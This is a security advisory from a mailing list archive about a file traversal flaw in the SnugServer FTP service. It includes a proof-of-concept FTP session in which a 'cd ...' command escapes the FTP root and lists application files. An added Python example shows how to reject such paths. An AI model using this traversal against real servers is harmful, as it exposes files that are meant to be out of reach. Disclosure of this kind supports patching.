Full Disclosure mailing list archives

Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service


From: <muts () zahav net il>
Date: Thu, 27 Jan 2005 17:37:41 +0200

See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks.
Product Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in the
SnugServer 3.0.0.40 FTP Service which allows access to the
server filesystem outside of ftproot. As the session below
shows, a "cd ..." request (three dots) leaves the FTP root and
exposes the server's application directory.

[-] PoC

root@Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
 Welcome FTP User. SnugServer is ready. 
 Name (192.168.1.154:root): muts () default com
331  Password required for muts () default com.
Password:
230  See FTP Server 
Remote system type is You.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
 drw-rw-rw-   1 owner    group            0  Jan 21 03:51 ..
 drw-rw-rw-   1 owner    group            0  Jan 21 02:08 dir
226  Transfer Complete.
ftp> cd ...
200  PORT Command Successful.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ..
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Cert
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Logs
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Requests
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Scripts
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Errors
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Queue
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 www
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Infected
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Temp
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Filtered
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 BaseData
-rw-rw-rw-   1 owner    group 8421376  Jan 21 03:52 SNUG.FDB
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ftp
-rw-rw-rw-   1 owner    group 1861120  Jan 21 03:52 Snug.gbk
-rw-rw-rw-   1 owner    group   32  Jan 21 03:52 yarrow.rnd
226  Transfer Complete.
ftp>
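As an added defensive example (not SnugServer's code), the following Python path resolver shows the check an FTP service needs so that a request like the "cd ..." above cannot resolve outside ftproot: dot-only components are rejected before normalisation, and the real path is re-checked after symlink resolution. FTPROOT and the sample requests are constructed for the example.

```python
import os
import posixpath
import re

# Constructed for this example; a real server reads its root from configuration.
FTPROOT = "/srv/snug/ftproot"

# Components made only of three or more dots ("...", "...."). posixpath.normpath
# leaves them untouched, so they must be rejected explicitly instead of being
# handed to the filesystem layer, which is where the advisory's "cd ..." ends up.
_DOT_RUN = re.compile(r"^\.{3,}$")


class TraversalError(ValueError):
    """Client-supplied path would leave the FTP root."""


def virtual_path(cwd: str, client_path: str) -> str:
    """Normalise a CWD/RETR/STOR argument in the virtual namespace rooted at '/'."""
    # Backslashes count as separators because a Windows host accepts them as such.
    path = client_path.replace("\\", "/")
    if not path.startswith("/"):
        path = posixpath.join(cwd, path)  # cwd is '/' right after login
    for component in path.split("/"):
        if _DOT_RUN.match(component):
            raise TraversalError(f"dot-only component rejected: {component!r}")
    # normpath collapses '.' and '..' and never climbs above '/', so "/dir/../.."
    # becomes "/" instead of escaping the root.
    return posixpath.normpath(path)


def resolve_ftp_path(ftproot: str, cwd: str, client_path: str) -> str:
    """Map a client path onto the real filesystem and confirm it stays under ftproot."""
    relative = virtual_path(cwd, client_path).lstrip("/")
    root = os.path.realpath(ftproot)
    real = os.path.realpath(os.path.join(root, relative))
    # Check again after symlink resolution: root itself or strictly below it.
    if real != root and not real.startswith(root + os.sep):
        raise TraversalError(f"resolved path escapes ftproot: {real}")
    return real


def is_allowed(ftproot: str, cwd: str, client_path: str) -> bool:
    """True when the request resolves inside ftproot, False when it is rejected."""
    try:
        resolve_ftp_path(ftproot, cwd, client_path)
    except TraversalError:
        return False
    return True
```

Running `is_allowed(FTPROOT, "/", "...")` returns False, while ordinary ".." requests are clamped at the root rather than rejected, which keeps normal client navigation working.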
 
[-] Patch

The vendor has been notified, and an update is available at:
 
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html